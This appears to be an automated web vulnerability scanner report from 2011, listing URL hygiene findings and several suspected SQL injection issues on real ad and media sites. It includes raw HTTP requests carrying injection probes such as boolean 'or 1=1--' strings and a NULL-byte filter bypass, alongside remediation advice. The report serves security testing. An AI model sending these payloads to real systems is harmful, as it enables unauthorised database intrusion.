26.74. http://www.radius-server.net/aradial-radius-server-billing-pop-main.html
26.75. http://www.radius-server.net/blank-inner.html
26.76. http://www.radius-server.net/radius-billing.html
26.77. http://www.radius.cistron.nl/
26.78. http://www.radius.cistron.nl/faq/
26.79. http://www.spotngo.ca/
26.80. http://www.spotngo.ca/services.htm
26.81. http://www.vm.ibm.com/favicon.ico
26.82. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
27. HTML uses unrecognised charset
27.1. http://js-kit.com/api/session/refresh.js
27.2. http://www.tmz.com/
27.3. http://www.tmz.com/2011/09/02/ncis-actor-my-neighbor-went-off-about-my-dead-mother-david-fisher-self-defense-police/
27.4. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/
27.5. http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/
27.6. http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
27.7. http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/
27.8. http://www.tmz.com/reset-password/
27.9. http://www.tmz.com/signin/
27.10. http://www.toofab.com/
27.11. http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
27.12. http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
27.13. http://www.toofab.com/category/celeb-couples/
27.14. http://www.toofab.com/news/
28. Content type incorrectly stated
28.1. http://a1.interclick.com/getInPageJS.aspx
28.2. http://a1.interclick.com/getInPageJSProcess.aspx
28.3. http://ad.doubleclick.net/pfadx/tmz_cim/
28.4. https://admin.usenetbinaries.com/favicon.ico
28.5. http://adserver.teracent.net/tase/ad
28.6. http://advancedvoip.com/images/VoIP_white_papers.jpg
28.7. http://advancedvoip.com/images/VoIP_white_papers_up.jpg
28.8. http://advancedvoip.com/images/voip_billing_company.jpg
28.9. http://advancedvoip.com/images/voip_billing_company_contact.jpg
28.10. http://advancedvoip.com/images/voip_billing_company_contact_p.jpg
28.11. http://advancedvoip.com/images/voip_billing_company_p.jpg
28.12. http://advancedvoip.com/images/voip_billing_enterprise_solution.jpg
28.13. http://advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg
28.14. http://advancedvoip.com/images/voip_billing_products.jpg
28.15. http://advancedvoip.com/images/voip_billing_products_p.jpg
28.16. http://advancedvoip.com/images/voip_billing_provider.jpg
28.17. http://advancedvoip.com/images/voip_billing_provider_p.jpg
28.18. http://ar.voicefive.com/b/rc.pli
28.19. http://attwireless-www.baynote.net/baynote/tags3/common
28.20. http://aud.pubmatic.com/AdServer/Artemis
28.21. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9QaG90b1NsaWRlU2hvdy9ZQUhPT18xNDNfQjJDX01haWxfRXhwYW5kYWJsZV85NTR4NjAsY3QkMzYsZHQodHkkcm0sY2kocGlkJFlhaG9vLGNpZCR5YWhvb2hvdXNlLGNtcGlkJE1haWwsa2lkJDMwNzgxMDEpLGNkKHRpbWUkMCx0eXBlJGluKSh0aW1lJDAsdHlwZSR0aSkpKQ/2
28.22. http://beap.adx.yahoo.com/reg_rm/YnY9MS4wLjAmYWw9KGFpZCRTYXBpZW50VGVzdC9ZYWhvb19JTS9ZQUhPT18xNDNfQjJDX01haWxfSU1fUHVzaERvd25fOTU0eDYwX0FkSW50ZXJheCxjdCQzNixkdCh0eSRybSxjaShwaWQkWWFob28sY2lkJHlhaG9vaG91c2UsY21waWQkTWFpbCxraWQkMzA5NjA3MiksY2QodGltZSQwLHR5cGUkaW4pKHRpbWUkMCx0eXBlJHRpKSkp/0
28.23. http://blekko.com/autocomplete
28.24. http://bostonherald.com/edge/includes/twitter.inc
28.25. http://bostonherald.com/news/includes/twitter.inc
28.26. http://bostonherald.com/projects/payroll_ajax_api.bg
28.27. http://bostonherald.com/track/includes/twitter.inc
28.28. http://bostonheraldnie.newspaperdirect.com/epaper/Services/HomePageHandler.ashx
28.29. http://bostonheraldnie.newspaperdirect.com/epaper/Services/ImgGalleryHandler.ashx
28.30. http://bs.serving-sys.com/BurstingPipe/adServer.bs
28.31. http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848
28.32. http://cpanel.app9.hubspot.com/salog.js.aspx
28.33. http://duckduckgo.com/d.js
28.34. http://event.adxpose.com/event.flow
28.35. http://goku.brightcove.com/1pix.gif
28.36. http://helpdocs.westserver.net/v3/sitemanager/whstart.ico
28.37. http://ibmwebsphere.tt.omtrdc.net/m2/ibmwebsphere/mbox/standard
28.38. http://imp.fetchback.com/serve/fb/adtag.js
28.39. http://livechat.iadvize.com/rpc/referrer.php
28.40. http://members.westhost.com/favicon.ico
28.41. http://network.realmedia.com/favicon.ico
28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx
28.43. http://oascentral.bostonherald.com/favicon.ico
28.44. http://pglb.buzzfed.com/63857/8b52baa86e5b07ac085974feb13e2090
28.45. http://pglb.buzzfed.com/63857/bb0a99aabad3110617eff2ef79bb3c27
28.46. http://pglb.buzzfed.com/63857/d9dfb925d83ec9decb12af7e255ebee7
28.47. http://ping.crowdscience.com/ping.js
28.48. http://ps2.newsinc.com/Playlist/show/90017/1564/1252.xml
28.49. http://ps2.newsinc.com/Playlist/show/90017/1957/507.xml
28.50. http://rt1302.infolinks.com/action/doq.htm
28.51. http://rt1302.infolinks.com/action/getads.htm
28.52. http://rt1701.infolinks.com/action/doq.htm
28.53. http://rt1702.infolinks.com/action/doq.htm
28.54. http://rt1803.infolinks.com/action/doq.htm
28.55. http://rt1901.infolinks.com/action/doq.htm
28.56. http://rt1903.infolinks.com/action/doq.htm
28.57. http://sales.liveperson.net/hcp/html/mTag.js
28.58. http://sensor2.suitesmart.com/sensor4.js
28.59. http://showadsak.pubmatic.com/AdServer/AdServerServlet
28.60. http://site.abc.go.com/_lib/getCountry
28.61. http://sr2.liveperson.net/hcp/html/mTag.js
28.62. http://stats.kaltura.com//api_v3/index.php
28.63. http://thumbnail.newsinc.com/23529280.sf.jpg
28.64. http://thumbnail.newsinc.com/23529394.sf.jpg
28.65. http://usenetjunction.com/scripts/track.php
28.66. http://www-03.ibm.com/innovation/us/watson/javascripts/pulse.js
28.67. http://www-146.ibm.com/nfluent/transwidget/tw.jsp
28.68. http://www.advancedvoip.com/images/VoIP_white_papers.jpg
28.69. http://www.advancedvoip.com/images/VoIP_white_papers_up.jpg
28.70. http://www.advancedvoip.com/images/voip_billing_company.jpg
28.71. http://www.advancedvoip.com/images/voip_billing_company_contact.jpg
28.72. http://www.advancedvoip.com/images/voip_billing_company_contact_p.jpg
28.73. http://www.advancedvoip.com/images/voip_billing_company_p.jpg
28.74. http://www.advancedvoip.com/images/voip_billing_enterprise_solution.jpg
28.75. http://www.advancedvoip.com/images/voip_billing_enterprise_solution_p.jpg
28.76. http://www.advancedvoip.com/images/voip_billing_products.jpg
28.77. http://www.advancedvoip.com/images/voip_billing_products_p.jpg
28.78. http://www.advancedvoip.com/images/voip_billing_provider.jpg
28.79. http://www.advancedvoip.com/images/voip_billing_provider_p.jpg
28.80. http://www.aradial.com/images/bg.gif
28.81. http://www.att.com/media/en_US/images/ico/ico_security_AA0009X7.jpg
28.82. http://www.att.com/navservice/navservlet
28.83. http://www.att.com/u-verse/dwr/interface/DWRRequestManager.js
28.84. http://www.bostonherald.com/news/includes/twitter.inc
28.85. http://www.cpanel.net/images/logo.jpg
28.86. https://www.easynews.com/signup/lookit.phtml
28.87. http://www.giganews.com/favicon.ico
28.88. https://www.giganews.com/favicon.ico
28.89. http://www.ibm.com/developerworks/dwtagg/css/h3/dogear.css
28.90. http://www.ibm.com/developerworks/dwtags/dwjquerytabtags
28.91. http://www.ibm.com/developerworks/java/inc/author-module.inc
28.92. http://www.ibm.com/developerworks/tagging/UseCaseServlet
28.93. http://www.ibm.com/developerworks/utils/ratingJSON.jsp
28.94. http://www.mailjet.com/ajax/home/emailLiveCounter
28.95. http://www.mokafive.com/highslide/graphics/zoomin.cur
28.96. http://www.mokafive.com/highslide/graphics/zoomout.cur
28.97. http://www.mokafive.com/images/mokafive_favicon.ico
28.98. http://www.open.com.au/favicon.ico
28.99. https://www.open.com.au/favicon.ico
28.100. http://www.radius-server.net/images/bg.gif
28.101. http://www.radius-server.net/images/logo.gif
28.102. http://www.radius-server.net/images/sm-adv.gif
28.103. http://www.radius-server.net/images/telelogo.gif
28.104. http://www.radius.cistron.nl/README.pam
28.105. http://www.thundernews.com/favicon.ico
28.106. https://www.thundernews.com/favicon.ico
28.107. http://www.usenetbinaries.com/favicon.ico
28.108. http://www.websitealive2.com/89/Visitor/vTracker_v2.asp
28.109. http://www.westhost.com/favicon.ico
29. Content type is not specified
29.1. http://3ps.go.com/DynamicAd
29.2. http://ad.yieldmanager.com/st
29.3. http://ads.bluelithium.com/st
29.4. http://traffic.outbrain.com/network/redir
29.5. http://www.meebo.com/cmd/btproviders
29.6. http://www.meebo.com/cmd/tc
30. SSL certificate
1. SQL injection
There are 40 instances of this issue:
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs that you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights and to avoid vulnerabilities being introduced by changes elsewhere within the application's code base.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
- Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://a.abc.com/service/sfp/omnitureconfig/ [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://a.abc.com |
| Path: | /service/sfp/omnitureconfig/ |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 97170536'%20or%201%3d1--%20 and 97170536'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /service97170536'%20or%201%3d1--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed01
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:03:35 GMT
Connection: close

<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY>This document has moved to <A HREF="http://abc.go.com/error ">http://abc.go.com/error </A>.<BODY></HTML>
Request 2
GET /service97170536'%20or%201%3d2--%20/sfp/omnitureconfig/?pageId=4dc00ac0_f316_48f9_bbbc_df7e9b2d0b9b&showId=SH014193940000&pageURL=http://beta.abc.go.com/shows/charlies-angels HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 17 Sep 2011 01:03:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed08
X-Powered-By: ASP.NET
Cache-Expires: Sat, 17 Sep 2011 01:08:35 GMT
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Content-Length: 0
Cache-Control: max-age=300
Date: Sat, 17 Sep 2011 01:03:38 GMT
Connection: close
1.2. http://ad.doubleclick.net/adi/N884.abc.com/B5709785.10 [id cookie]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://ad.doubleclick.net |
| Path: | /adi/N884.abc.com/B5709785.10 |
Issue detail
The id cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the id cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00'
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7358
Set-Cookie: id=c81da3c3c0000be||t=1316221599|et=730|cs=002213fd4807e2941091f2164a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:39 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:39 GMT
Date: Sat, 17 Sep 2011 01:06:39 GMT
Expires: Sat, 17 Sep 2011 01:06:39 GMT
Cache-Control: private, max-age=300

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Jan 27 16:06:44 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.j ...[SNIP]... ash"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adi/N884.abc.com/B5709785.10;sz=728x90;click=http://log.go.com/log?srvc%3dabc%26guid%3d7D9136E5-7896-4338-9939-E469671F34DA%26drop%3d0%26addata%3d0:91104:841141:52312%26a%3d1%26goto%3d;pc=dig841141dc1010790;ord=2011.09.16.17.57.56? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT%00''
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 1667
Set-Cookie: id=c91da3c3c000047||t=1316221600|et=730|cs=002213fd48f445365653400eb4; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:06:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:06:40 GMT
Date: Sat, 17 Sep 2011 01:06:40 GMT
Expires: Sat, 17 Sep 2011 01:06:40 GMT
Cache-Control: private, max-age=300

<script type="text/javascript"> var spongecellParams = { clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/f/8b/%2a/i%3B243805900%3B1-0%3B0%3B67516235%3B3454-728/90%3B42127629/42145416/1%3B ...[SNIP]...
1.3. http://ad.doubleclick.net/adj/tmz.toofab.wb.dart/ [name of an arbitrarily supplied request parameter]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://ad.doubleclick.net |
| Path: | /adj/tmz.toofab.wb.dart/ |
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00'=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6149
Set-Cookie: id=cfbdc3c3c000003||t=1316221750|et=730|cs=002213fd486089af9086817dd8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:10 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:10 GMT
Date: Sat, 17 Sep 2011 01:09:10 GMT
Expires: Sat, 17 Sep 2011 01:09:10 GMT
Cache-Control: private

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu Sep 08 17:56:44 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adj/tmz.toofab.wb.dart/;pos=atf;boxad=1;syncad=yes;tile=1;dcopt=ist;sz=728x90,970x66;qcseg=D;ord=9367342558689416&1%00''=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 767
Set-Cookie: id=ce3dc3c3c000038||t=1316221751|et=730|cs=002213fd48f22ac6f4531511ae; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 01:09:11 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 01:09:11 GMT
Date: Sat, 17 Sep 2011 01:09:11 GMT
Expires: Sat, 17 Sep 2011 01:09:11 GMT
Cache-Control: private

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2105173&PluID=0&w=728&h=90&ord=1802222&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/j%3B ...[SNIP]...
1.4. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://adsatt.abc.starwave.com |
| Path: | /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad'%20and%201%3d1--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: N7ADWEB05 X-Powered-By: ASP.NET Date: Sat, 17 Sep 2011 01:05:08 GMT Connection: close Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad'%20and%201%3d2--%20/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
